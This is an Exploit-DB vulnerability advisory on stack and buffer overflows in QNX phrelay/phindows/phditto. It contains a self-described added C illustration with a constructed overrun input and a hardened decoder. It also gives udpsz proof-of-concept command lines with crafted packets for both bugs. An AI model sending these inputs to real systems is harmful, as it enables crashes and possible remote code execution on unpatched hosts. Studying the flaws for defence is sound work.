QNX phrelay/phindows/phditto - Multiple Vulnerabilities

EDB-ID:   18864
CVE:      (none listed)
Platform: Windows
Date:     2012-05-11


#######################################################################

                             Luigi Auriemma

Application:  QNX phrelay/phindows/phditto
              http://www.qnx.com
              http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
              http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
Versions:     current
Platforms:    QNX Neutrino RTOS and Windows
Bugs:         A] bpe_decompress stack overflow
              B] Photon Session buffer overflow
Exploitation: remote
              A] versus client and maybe server
              B] versus server
Date:         10 May 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


phrelay, phindows and phditto speak a private protocol that lets another
machine use the Photon graphical environment of the server (exported
through the phrelay inetd program) from a client such as phindows,
phditto or any other implementation of the protocol.


#######################################################################

=======
2) Bugs
=======

--------------------------------
A] bpe_decompress stack overflow
--------------------------------

The BPE (byte pair encoding) decompressor keeps its pair table in two
256-byte stack buffers called "left" and "right".
The bpe_decompress function, shared by all the client and server
programs of this protocol, suffers a stack-based buffer overflow
because the index used to store the entries read sequentially from the
stream into these two buffers is never checked against their size.
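As an added illustration, not code from the advisory or from QNX, the C below models the pair-table reader of the classic public-domain byte-pair decoder, which uses exactly the left[256]/right[256] stack layout the advisory names; that the Photon bpe_decompress follows that layout and that the unchecked index is the defect is an assumption, since the advisory does not show the code. In the classic loop the only test for the end of the table is an equality check against 256, so a "skip" count that carries the index past 256 without landing on it keeps the loop writing table entries beyond both buffers. The first function reproduces that loop but only records the highest index it would write to; the second is a hardened decoder for the same block format. Both input blocks are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define BPE_TABLE 256   /* size of the left[] and right[] stack buffers */
#define BPE_STACK 30    /* pair-expansion stack of the classic decoder */

/* Dry run of the classic decoder's pair-table loop: same arithmetic, same
 * single "c == 256" exit test, but it only records the highest index it
 * would write to left[]/right[] instead of writing.  A result above 255
 * means the real loop writes past both 256-byte stack buffers.  Returns
 * -1 if the input ends before the first table write. */
int bpe_table_max_index(const uint8_t *in, size_t len)
{
    size_t pos = 0;
    int c = 0, count, i, max = -1;

    if (len == 0) return max;
    count = in[pos++];
    for (;;) {
        if (count > 127) { c += count - 127; count = 0; } /* skip literals: c can jump past 256 */
        if (c == 256) break;                              /* the only exit test: == rather than >= */
        for (i = 0; i <= count; i++, c++) {
            if (pos >= len) return max;
            if (c > max) max = c;                         /* real code: left[c] = in[pos] */
            if (in[pos++] != c) {                         /* a pair entry also carries right[c] */
                if (pos >= len) return max;
                pos++;                                    /* real code: right[c] = in[pos] */
            }
        }
        if (c == 256) break;
        if (pos >= len) return max;
        count = in[pos++];
    }
    return max;
}

/* Hardened decoder for one block of the same format:
 *   count, table entries..., size_hi, size_lo, <size> packed bytes.
 * Table indices, the packed size, the expansion stack and the output are
 * all bounds-checked.  Returns bytes written to out, or -1 on bad input. */
long bpe_decompress_safe(const uint8_t *in, size_t len, uint8_t *out, size_t outcap)
{
    uint8_t left[BPE_TABLE], right[BPE_TABLE], stack[BPE_STACK];
    size_t pos = 0, n = 0, size;
    int c, count, i, sp = 0;

    for (c = 0; c < BPE_TABLE; c++) { left[c] = (uint8_t)c; right[c] = 0; } /* left[c] == c: literal */
    if (len == 0) return -1;
    count = in[pos++];
    for (c = 0;;) {
        if (count > 127) { c += count - 127; count = 0; }
        if (c > BPE_TABLE) return -1;                     /* a skip that overshoots the table */
        if (c == BPE_TABLE) break;
        for (i = 0; i <= count; i++, c++) {
            if (c >= BPE_TABLE || pos >= len) return -1;  /* entry would land past the table */
            left[c] = in[pos++];
            if (left[c] != c) {
                if (pos >= len) return -1;
                right[c] = in[pos++];
            }
        }
        if (c == BPE_TABLE) break;
        if (pos >= len) return -1;
        count = in[pos++];
    }
    if (len - pos < 2) return -1;
    size = ((size_t)in[pos] << 8) | in[pos + 1];
    pos += 2;
    if (size > len - pos) return -1;                      /* packed size must fit the input */
    for (;;) {
        if (sp) c = stack[--sp];                          /* pop a pending byte ... */
        else if (size == 0) break;
        else { size--; c = in[pos++]; }                   /* ... or read the next packed byte */
        if (c == left[c]) {
            if (n >= outcap) return -1;                   /* output capacity */
            out[n++] = (uint8_t)c;
        } else {
            if (sp + 2 > BPE_STACK) return -1;            /* nesting too deep, or a cyclic pair table */
            stack[sp++] = right[c];
            stack[sp++] = left[c];
        }
    }
    return (long)n;
}

/* Constructed block: pair 0x58 -> "AB", table closed exactly at 256, then
 * three packed 0x58 bytes, which expand to "ABABAB". */
static const uint8_t benign[] = {
    0xD7, 0x41, 0x42,   /* skip 88 literals; entry left[88]='A', right[88]='B' */
    0xFF, 0xD9,         /* skip 128; literal entry at 217                     */
    0xA4, 0xFF,         /* skip 37;  literal entry at 255 -> c == 256         */
    0x00, 0x03, 0x58, 0x58, 0x58
};
/* Constructed block: the skips move c 1 -> 131 -> 259, never equalling 256,
 * so the classic loop stores an entry at left[259]/right[259]. */
static const uint8_t overrun[] = { 0x80, 0x01, 0xFF, 0x82, 0xFF, 0x41, 0x42 };

int main(void)
{
    uint8_t out[64];
    long n = bpe_decompress_safe(benign, sizeof benign, out, sizeof out);
    printf("benign: %ld bytes \"%.*s\"\n", n, (int)(n > 0 ? n : 0), (const char *)out);
    printf("overrun: classic loop reaches index %d, hardened decoder returns %ld\n",
           bpe_table_max_index(overrun, sizeof overrun),
           bpe_decompress_safe(overrun, sizeof overrun, out, sizeof out));
    return 0;
}
```

The dry run on the second block reports index 259, three entries past the end of each 256-byte buffer; feeding further 0xFF skip counts keeps adding 128 to the index, so an attacker controls how far past the buffers the writes go and what bytes land there. The hardened decoder rejects that block as soon as the skip overshoots the table, and also caps the expansion stack, which is the other fixed-size array in this decoder that untrusted pair tables can drive.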


---------------------------------
B] Photon Session buffer overflow
---------------------------------

A buffer overflow in phrelay in the handling of the device-file name
that the client supplies as the existing Photon session to attach to.


Note: since phrelay is not enabled by default, and when enabled it
already accepts unauthenticated connections directly to /dev/photon
(the screen physically visible on the machine), and since
phindows/phditto must be manually pointed at the malicious host to
exploit bug A, this advisory should be considered only a case study and
nothing more.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip


A]
At the moment I don't know how to call bpe_decompress on phrelay, but I
have verified that the bpe_decompress function is vulnerable at 100%.
The following test works only on phindows/phditto (the proof-of-concept
acts as a server):

  udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff

B]
  udpsz -C "a5 10 00 00 0000 ffff   1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff


#######################################################################

======
4) Fix
======


No fix.


#######################################################################